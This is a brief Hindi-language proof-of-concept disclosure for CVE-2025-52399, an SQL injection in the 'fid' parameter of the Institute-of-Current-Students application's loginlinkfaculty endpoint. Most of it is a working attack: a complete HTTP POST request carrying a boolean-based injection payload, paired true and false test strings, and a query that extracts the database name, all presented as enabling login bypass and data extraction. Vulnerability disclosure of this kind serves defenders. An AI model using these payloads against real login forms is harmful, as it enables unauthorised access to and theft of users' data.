
CVE-2025-52399 के लिए प्रमाण-अवधारणा शोषण, Institute-of-Current-Students के loginlinkfaculty एंडपॉइंट में SQL इंजेक्शन का प्रदर्शन, प्रमाणीकरण बायपास और डेटा निष्कर्षण सक्षम करता है।
Institute-of-Current-Students एप्लिकेशन में loginlinkfaculty एंडपॉइंट fid POST पैरामीटर के माध्यम से SQL इंजेक्शन के प्रति संवेदनशील है। SQL क्वेरी में उपयोग करने से पहले पैरामीटर को ठीक से स्वच्छ नहीं किया जाता, जिससे दूरस्थ हमलावर मनमानी SQL कमांड निष्पादित कर सकते हैं।
/loginlinkfaculty (POST)fidicsnewPOST /Institute-of-Current-Students/loginlinkfaculty HTTP/1.1
Host: localhost
Content-Type: application/x-www-form-urlencoded
fid=-1'+OR+3*2*1=6+AND+000942=000942--&pass=example
✅ -1' OR 3*2*1=6 AND 000942=000942 -- → सत्य
❌ -1' OR 2*3=4 AND 000942=000942 -- → असत्य
SELECT database(); -- returns 'icsnew'
Isroil Mustafoqulov